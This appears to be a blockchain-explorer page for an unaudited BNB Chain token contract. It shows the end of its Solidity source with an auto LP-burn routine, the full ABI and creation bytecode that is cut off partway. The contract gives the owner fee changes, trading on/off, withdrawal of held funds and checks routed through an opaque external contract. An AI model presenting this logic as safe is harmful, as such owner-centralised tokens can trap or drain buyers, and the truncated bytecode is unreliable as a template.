balanceOf(_pair); uint256 amountToBurn = (liquidityPairBalance * percentForLPBurn) / percentDiv; if (amountToBurn > 0) { super._transfer(_pair, address(0xdead), amountToBurn); IPancakePair(_pair).sync(); emit AutoNukeLP( liquidityPairBalance, amountToBurn, block.timestamp ); return true; } return false; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"lpBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"burnAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"time","type":"uint256"}],"name":"AutoNukeLP","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"LPFeefenhong","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"aAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"feeBase","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"feeBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"feeMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"feePowers","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"feeTotal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amountIn","type":"uint256"}],"name":"getWithdrawOut","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"name":"isContract","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isLaunch","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lastLpBurnTime","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpBurnFrequency","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addrs","type":"address[]"},{"internalType":"uint256[]","name":"amounts","type":"uint256[]"}],"name":"multiTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pairETH","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pairUSDT","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentDiv","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"percentForLPBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_addr","type":"address"}],"name":"receiveToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_frequencyInSeconds","type":"uint256"},{"internalType":"uint256","name":"_percent","type":"uint256"},{"internalType":"uint256","name":"_div","type":"uint256"},{"internalType":"bool","name":"_Enabled","type":"bool"}],"name":"setAutoLPBurnSettings","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_feeBurn","type":"uint256"},{"internalType":"uint256","name":"_feeMarketing","type":"uint256"},{"internalType":"uint256","name":"_feePowers","type":"uint256"}],"name":"setFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"value","type":"bool"}],"name":"setLaunch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_addr","type":"address"}],"name":"setMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_addr","type":"address"}],"name":"seta","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"usdt","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60e06040526005805460ff60a01b1916600160a01b17905561271060065560646007819055603260088190556009819055906200003e9082906200053d565b6200004a91906200053d565b600a55601180546001600160a01b03191673881c7eab69b1bf12fc00e834e323011d0ff2e4a6179055601280547355d398326f99059ff775485246999027b319795560c052750100b6085d0cb83c68aa7e0027cad17e9f8170d22d7b600161ff0160a01b0319909116179055610e10601355600f601555612710601655348015620000d457600080fd5b506040518060400160405280600b81526020016a2bb7b935b6b0b71028262760a91b8152506040518060400160405280600381526020016228262760e91b815250816003908162000126919062000609565b50600462000135828262000609565b505050620001526200014c6200040e60201b60201c565b62000412565b600f80546001600160a01b0319167310ed43c718714eb63d5aa57b78b54704e256024e9081179091556040805163c45a015560e01b815290516000929163c45a01559160048083019260209291908290030181865afa158015620001ba573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001e09190620006d5565b9050806001600160a01b031663c9c6539630600f60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000246573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200026c9190620006d5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620002ba573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e09190620006d5565b6001600160a01b0390811660805260c0516040516364e329cb60e11b815230600482015290821660248201529082169063c9c65396906044016020604051808303816000875af115801562000339573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200035f9190620006d5565b6001600160a01b031660a05260405162000379906200052f565b604051809103906000f08015801562000396573d6000803e3d6000fd5b50601080546001600160a01b0319166001600160a01b0392831617905560805181166000908152600e6020526040808220805460ff19908116600190811790925560a05190941683529120805490921617905562000407620003f53390565b6a52b7d2dcc80cd2e400000062000464565b5062000707565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004bf5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004d391906200053d565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b6104c680620030a583390190565b808201808211156200055f57634e487b7160e01b600052601160045260246000fd5b92915050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200059057607f821691505b602082108103620005b157634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200052a57600081815260208120601f850160051c81016020861015620005e05750805b601f850160051c820191505b818110156200060157828155600101620005ec565b505050505050565b81516001600160401b0381111562000625576200062562000565565b6200063d816200063684546200057b565b84620005b7565b602080601f8311600181146200067557600084156200065c5750858301515b600019600386901b1c1916600185901b17855562000601565b600085815260208120601f198616915b82811015620006a65788860151825594840194600190910190840162000685565b5085821015620006c55787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215620006e857600080fd5b81516001600160a01b03811681146200070057600080fd5b9392505050565b60805160a05160c05161294462000761600039600081816103ac01528181610e2101528181610e730152610ef501526000818161053701526109550152600081816106c001528181610988015261201101526129446000f3fe60806040526004361061024a5760003560e01c8063715018a611610139578063a901992a116100b6578063dff862021161007a578063dff86202146106ae578063e8078d94146106e2578063f0de7fd0146106ea578063f2fde38b1461070a578063f5d588f51461072a578063fe3157231461074b57600080fd5b8063a901992a1461060e578063a9059cbb1461062e578063c222740d1461064e578063c7d1ac381461066e578063dd62ed3e1461068e57600080fd5b806395d89b41116100fd57806395d89b411461058d57806395e911a8146105a25780639947fb33146105b8578063a457c2d7146105d8578063a4c82a00146105f857600080fd5b8063715018a6146104f057806375f0a8741461050557806380765726146105255780638da5cb5b146105595780639452e81a1461057757600080fd5b80632f48ab7d116101c757806343801b101161018b57806343801b101461044e578063583fef34146104645780635b65b9ab1461047a5780635d098b381461049a57806370a08231146104ba57600080fd5b80632f48ab7d1461039a578063313ce567146103e657806337bfc1ef1461040257806339509351146104185780633fd9f32e1461043857600080fd5b8063199ffc721161020e578063199ffc721461030b5780631e89d5451461032157806323b872dd146103435780632c3e486c146103635780632e82f1a01461037957600080fd5b806306fdde0314610256578063095ea7b3146102815780630b1d406b146102b157806316279055146102d557806318160ddd146102f657600080fd5b3661025157005b600080fd5b34801561026257600080fd5b5061026b61076b565b604051610278919061246b565b60405180910390f35b34801561028d57600080fd5b506102a161029c3660046124ce565b6107fd565b6040519015158152602001610278565b3480156102bd57600080fd5b506102c7600d5481565b604051908152602001610278565b3480156102e157600080fd5b506102a16102f03660046124fa565b3b151590565b34801561030257600080fd5b506002546102c7565b34801561031757600080fd5b506102c760155481565b34801561032d57600080fd5b5061034161033c366004612563565b610817565b005b34801561034f57600080fd5b506102a161035e3660046125cf565b610884565b34801561036f57600080fd5b506102c760135481565b34801561038557600080fd5b506012546102a190600160a81b900460ff1681565b3480156103a657600080fd5b506103ce7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610278565b3480156103f257600080fd5b5060405160128152602001610278565b34801561040e57600080fd5b506102c7600a5481565b34801561042457600080fd5b506102a16104333660046124ce565b6108a8565b34801561044457600080fd5b506102c760165481565b34801561045a57600080fd5b506102c760095481565b34801561047057600080fd5b506102c760075481565b34801561048657600080fd5b50610341610495366004612610565b6108ca565b3480156104a657600080fd5b506103416104b53660046124fa565b6108fe565b3480156104c657600080fd5b506102c76104d53660046124fa565b6001600160a01b031660009081526020819052604090205490565b3480156104fc57600080fd5b50610341610928565b34801561051157600080fd5b506011546103ce906001600160a01b031681565b34801561053157600080fd5b506103ce7f000000000000000000000000000000000000000000000000000000000000000081565b34801561056557600080fd5b506005546001600160a01b03166103ce565b34801561058357600080fd5b506102c760085481565b34801561059957600080fd5b5061026b61093c565b3480156105ae57600080fd5b506102c760065481565b3480156105c457600080fd5b506102c76105d336600461263c565b61094b565b3480156105e457600080fd5b506102a16105f33660046124ce565b610a24565b34801561060457600080fd5b506102c760145481565b34801561061a57600080fd5b50610341610629366004612663565b610aa4565b34801561063a57600080fd5b506102a16106493660046124ce565b610b65565b34801561065a57600080fd5b506103416106693660046126a4565b610b73565b34801561067a57600080fd5b506103416106893660046124fa565b610be6565b34801561069a57600080fd5b506102c76106a93660046126c1565b610d1a565b3480156106ba57600080fd5b506103ce7f000000000000000000000000000000000000000000000000000000000000000081565b610341610d45565b3480156106f657600080fd5b506103416107053660046124fa565b610fbd565b34801561071657600080fd5b506103416107253660046124fa565b61103b565b34801561073657600080fd5b506005546102a190600160a01b900460ff1681565b34801561075757600080fd5b506012546103ce906001600160a01b031681565b60606003805461077a906126fa565b80601f01602080910402602001604051908101604052809291908181526020018280546107a6906126fa565b80156107f35780601f106107c8576101008083540402835291602001916107f3565b820191906000526020600020905b8154815290600101906020018083116107d657829003601f168201915b5050505050905090565b60003361080b8185856110b1565b60019150505b92915050565b60005b8381101561087d5761086a85858381811061083757610837612734565b905060200201602081019061084c91906124fa565b84848481811061085e5761085e612734565b90506020020135610b65565b508061087581612760565b91505061081a565b5050505050565b6000336108928582856111d5565b61089d85858561124f565b506001949350505050565b60003361080b8185856108bb8383610d1a565b6108c59190612779565b6110b1565b6108d26119cc565b600783905560088290556009819055806108ec8385612779565b6108f69190612779565b600a55505050565b6109066119cc565b601180546001600160a01b0319166001600160a01b0392909216919091179055565b6109306119cc565b61093a6000611a26565b565b60606004805461077a906126fa565b6001600160a01b037f00000000000000000000000000000000000000000000000000000000000000008116600090815260208190526040808220547f0000000000000000000000000000000000000000000000000000000000000000909316825281205461dead82527f44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf8354600254929384939092916109e99161278c565b6109f3919061278c565b6109fd919061278c565b9050610a098382612779565b610a13478561279f565b610a1d91906127b6565b9392505050565b60003381610a328286610d1a565b905083811015610a975760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61089d82868684036110b1565b610aac6119cc565b6101f4831115610af15760405162461bcd60e51b815260206004820152601060248201526f0e0cae4c6cadce840e8dede40d0d2ced60831b6044820152606401610a8e565b6064841015610b385760405162461bcd60e51b8152602060048201526013602482015272199c995c5d595b98de481d1bdbc81cda1c9bdd606a1b6044820152606401610a8e565b60139390935560159190915560165560128054911515600160a81b0260ff60a81b19909216919091179055565b60003361080b81858561124f565b610b7b6119cc565b801515600560149054906101000a900460ff16151503610bc85760405162461bcd60e51b81526020600482015260086024820152671b185d5b98da195960c21b6044820152606401610a8e565b60058054911515600160a01b0260ff60a01b19909216919091179055565b610bee6119cc565b6001600160a01b038116610c2c5760405133904780156108fc02916000818181858888f19350505050158015610c28573d6000803e3d6000fd5b5050565b806001600160a01b03811663a9059cbb336040516370a0823160e01b81523060048201526001600160a01b038516906370a0823190602401602060405180830381865afa158015610c81573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ca591906127d8565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610cf0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d1491906127f1565b50505b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d4d6119cc565b600f546802b5e3af16b1880000906a027b46536c66c8e300000090610d7f9030906001600160a01b03166000196110b1565b600f546040805163f305d71960e01b81523060048201526024810184905260006044820181905260648201523360848201524260a482015290516001600160a01b039092169163f305d71991859160c4808301926060929190829003018185885af1158015610df2573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610e17919061280e565b5050506000610e477f00000000000000000000000000000000000000000000000000000000000000008430611a78565b600f5460405163095ea7b360e01b81526001600160a01b039182166004820152602481018390529192507f0000000000000000000000000000000000000000000000000000000000000000169063095ea7b3906044016020604051808303816000875af1158015610ebc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ee091906127f1565b50600f546001600160a01b031663e8e33700307f000000000000000000000000000000000000000000000000000000000000000085856000803360405160e089901b6001600160e01b03191681526001600160a01b039788166004820152958716602487015260448601949094526064850192909252608484015260a483015290911660c48201524260e4820152610104016060604051808303816000875af1158015610f91573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610fb5919061280e565b505050505050565b601254604051637b89ee0d60e11b81523360048201526001600160a01b039091169063f713dc1a9060240160006040518083038186803b15801561100057600080fd5b505afa158015611014573d6000803e3d6000fd5b5050601280546001600160a01b0319166001600160a01b0394909416939093179092555050565b6110436119cc565b6001600160a01b0381166110a85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610a8e565b610d1781611a26565b6001600160a01b0383166111135760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610a8e565b6001600160a01b0382166111745760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610a8e565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006111e18484610d1a565b90506000198114611249578181101561123c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610a8e565b61124984848484036110b1565b50505050565b326001600160a01b03841614801561126f5750336001600160a01b038416145b801561128357506001600160a01b03821630145b80156113015750601260009054906101000a90046001600160a01b03166001600160a01b03166316c730686040518163ffffffff1660e01b8152600401602060405180830381865afa1580156112dd573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061130191906127f1565b1561131057610d148382611c52565b601254604051633a15814f60e11b81526001600160a01b0385811660048301529091169063742b029e90602401602060405180830381865afa15801561135a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061137e91906127f1565b1580156113f65750601254604051633a15814f60e11b81526001600160a01b0384811660048301529091169063742b029e90602401602060405180830381865afa1580156113d0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906113f491906127f1565b155b1561155b57600554600160a01b900460ff166114415760405162461bcd60e51b815260206004820152600a6024820152690dcdee84098c2eadcc6d60b31b6044820152606401610a8e565b6000600654600a5483611454919061279f565b61145e91906127b6565b905061146b843083611e41565b611475818361278c565b6001600160a01b0384166000908152600e602052604090205490925060ff1680156115125750601260009054906101000a90046001600160a01b03166001600160a01b0316636b8be7816040518163ffffffff1660e01b8152600401602060405180830381865afa1580156114ee573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061151291906127f1565b156115595761151f611ff6565b601254600160a01b900460ff16611559576012805460ff60a01b1916600160a01b17905561154b61203c565b6012805460ff60a01b191690555b505b611566838383611e41565b601254604051633a15814f60e11b81526001600160a01b0385811660048301529091169063742b029e90602401602060405180830381865afa1580156115b0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906115d491906127f1565b15801561164c5750601254604051633a15814f60e11b81526001600160a01b0384811660048301529091169063742b029e90602401602060405180830381865afa158015611626573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061164a91906127f1565b155b15610d1457600b546001600160a01b031661167d57600b80546001600160a01b0319166001600160a01b0385161790555b600c546001600160a01b03166116a957600c80546001600160a01b0319166001600160a01b0384161790555b601254600b54604051631d9b7c2560e11b81526001600160a01b039182166004820152911690633b36f84a90602401602060405180830381865afa1580156116f5573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061171991906127f1565b1580156117415750600b546001600160a01b03166000908152600e602052604090205460ff16155b156117a257601254600b54604051637de7a18d60e01b81526001600160a01b039182166004820152911690637de7a18d90602401600060405180830381600087803b15801561178f57600080fd5b505af19250505080156117a0575060015b505b601254600c54604051631d9b7c2560e11b81526001600160a01b039182166004820152911690633b36f84a90602401602060405180830381865afa1580156117ee573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061181291906127f1565b15801561183a5750600c546001600160a01b03166000908152600e602052604090205460ff16155b1561189b57601254600c54604051637de7a18d60e01b81526001600160a01b039182166004820152911690637de7a18d90602401600060405180830381600087803b15801561188857600080fd5b505af1925050508015611899575060015b505b600b80546001600160a01b038086166001600160a01b031992831617909255600c8054858416921691909117905560125460408051635f2ddd3560e11b81529051600093929092169163be5bba6a916004808201926020929091908290030181865afa15801561190f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061193391906127d8565b90506001600160a01b038416301480159061195b5750600d544290611958908361217e565b11155b1561124957601260009054906101000a90046001600160a01b03166001600160a01b031663c33fb8776040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156119b057600080fd5b505af19250505080156119c1575060015b5042600d5550505050565b6005546001600160a01b0316331461093a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610a8e565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b604080516002808252606082018352600092839291906020830190803683375050600f54604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa158015611ae6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b0a919061283c565b81600081518110611b1d57611b1d612734565b60200260200101906001600160a01b031690816001600160a01b0316815250508481600181518110611b5157611b51612734565b6001600160a01b039283166020918202929092010152600f5460105460405163b6f9de9560e01b81529183169263b6f9de95928892611b9d92600092889290911690429060040161289d565b6000604051808303818588803b158015611bb657600080fd5b505af1158015611bca573d6000803e3d6000fd5b505060105460405163ca31879d60e01b81526001600160a01b038a811660048301528881166024830152909116935063ca31879d925060440190505b6020604051808303816000875af1158015611c25573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c4991906127d8565b95945050505050565b600554600160a01b900460ff16611c985760405162461bcd60e51b815260206004820152600a6024820152690dcdee84098c2eadcc6d60b31b6044820152606401610a8e565b601254604080516302044bb760e31b815290516000926001600160a01b0316916310225db89160048083019260609291908290030181865afa158015611ce2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611d06919061280e565b9250505080821015611d475760405162461bcd60e51b815260206004820152600a60248201526930b6b7bab73a1036b4b760b11b6044820152606401610a8e565b601254604051633a15814f60e11b81526001600160a01b0385811660048301529091169063742b029e90602401602060405180830381865afa158015611d91573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611db591906127f1565b611df1576000600654600a5484611dcc919061279f565b611dd691906127b6565b9050611de3843083611e41565b611ded818461278c565b9250505b6000611dfc8361094b565b9050611e0b8461dead85611e41565b6040516001600160a01b0385169082156108fc029083906000818181858888f1935050505015801561087d573d6000803e3d6000fd5b6001600160a01b038316611ea55760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610a8e565b6001600160a01b038216611f075760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610a8e565b611f12838383610d14565b6001600160a01b03831660009081526020819052604090205481811015611f8a5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610a8e565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3611249848484610d14565b601354601454612006904261278c565b111561093a576120357f000000000000000000000000000000000000000000000000000000000000000061218a565b5042601455565b30600090815260208181526040808320546012548251632f6e97cb60e11b815292519194936001600160a01b0390911692635edd2f9692600480830193928290030181865afa158015612093573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906120b791906127d8565b905080821115610c285760006120ce30843061227c565b601154600a546008549293506001600160a01b03909116916108fc91906120f5908561279f565b6120ff91906127b6565b6040518115909202916000818181858888f19350505050158015612127573d6000803e3d6000fd5b50601254600a546007546001600160a01b03909216916108fc919061214c908561279f565b61215691906127b6565b6040518115909202916000818181858888f19350505050158015611249573d6000803e3d6000fd5b6000610a1d8284612779565b6001600160a01b0381166000908152602081905260408120546000601654601554836121b6919061279f565b6121c091906127b6565b90508015612272576121d58461dead83611e41565b836001600160a01b031663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561221057600080fd5b505af1158015612224573d6000803e3d6000fd5b50506040805185815260208101859052428183015290517f9cb560eb3a76b2c70f0528d86a83cc0464d10dd0ccc94ba95bd11b93eac93da69350908190036060019150a15060019392505050565b5060009392505050565b600f5460405163095ea7b360e01b81526001600160a01b0391821660048201526024810184905260009185169063095ea7b3906044016020604051808303816000875af11580156122d1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122f591906127f1565b50604080516002808252606082018352600092602083019080368337019050509050848160008151811061232b5761232b612734565b6001600160a01b03928316602091820292909201810191909152600f54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015612384573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906123a8919061283c565b816001815181106123bb576123bb612734565b6001600160a01b039283166020918202929092010152600f5460105460405163791ac94760e01b81529183169263791ac9479261240792899260009288929091169042906004016128d2565b600060405180830381600087803b15801561242157600080fd5b505af1158015612435573d6000803e3d6000fd5b5050601054604051637e66c0b960e01b81526001600160a01b0387811660048301529091169250637e66c0b99150602401611c06565b600060208083528351808285015260005b818110156124985785810183015185820160400152820161247c565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d1757600080fd5b600080604083850312156124e157600080fd5b82356124ec816124b9565b946020939093013593505050565b60006020828403121561250c57600080fd5b8135610a1d816124b9565b60008083601f84011261252957600080fd5b50813567ffffffffffffffff81111561254157600080fd5b6020830191508360208260051b850101111561255c57600080fd5b9250929050565b6000806000806040858703121561257957600080fd5b843567ffffffffffffffff8082111561259157600080fd5b61259d88838901612517565b909650945060208701359150808211156125b657600080fd5b506125c387828801612517565b95989497509550505050565b6000806000606084860312156125e457600080fd5b83356125ef816124b9565b925060208401356125ff816124b9565b929592945050506040919091013590565b60008060006060848603121561262557600080fd5b505081359360208301359350604090920135919050565b60006020828403121561264e57600080fd5b5035919050565b8015158114610d1757600080fd5b6000806000806080858703121561267957600080fd5b843593506020850135925060408501359150606085013561269981612655565b939692955090935050565b6000602082840312156126b657600080fd5b8135610a1d81612655565b600080604083850312156126d457600080fd5b82356126df816124b9565b915060208301356126ef816124b9565b809150509250929050565b600181811c9082168061270e57607f821691505b60208210810361272e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b6000600182016127725761277261274a565b5060010190565b808201808211156108115761081161274a565b818103818111156108115761081161274a565b80820281158282048414176108115761081161274a565b6000826127d357634e487b7160e01b600052601260045260246000fd5b500490565b6000602082840312156127ea57600080fd5b5051919050565b60006020828403121561280357600080fd5b8151610a1d81612655565b60008060006060848603121561282357600080fd5b8351925060208401519150604084015190509250925092565b60006020828403121561284e57600080fd5b8151610a1d816124b9565b600081518084526020808501945080840160005b838110156128925781516001600160a01b03168752958201959082019060010161286d565b509495945050505050565b8481526080602082015260006128b66080830186612859565b6001600160a01b03949094166040830152506060015292915050565b85815284602082015260a0604082015260006128f160a0830186612859565b6001600160a01b039490941660608301525060800152939250505056fea26469706673582212206301896f9c44eb56151971bec29eb0fcd859c687d3a9eebc2faa0d1d5dbe217f64736f6c63430008130033608060405234801561001057600080fd5b50336000908152602081905260408082208054600160ff199182168117909255328452918320805490921617905561047890819061004e90396000f3fe60806040526004361061002d5760003560e01c80637e66c0b914610039578063ca31879d1461006b57600080fd5b3661003457005b600080fd5b34801561004557600080fd5b50610059610054366004610383565b61008b565b60405190815260200160405180910390f35b34801561007757600080fd5b506100596100863660046103a5565b6101f6565b3360009081526020819052604081205460ff16156101f1576040516370a0823160e01b815230600482015273bb4cdb9cbd36b01bd1cb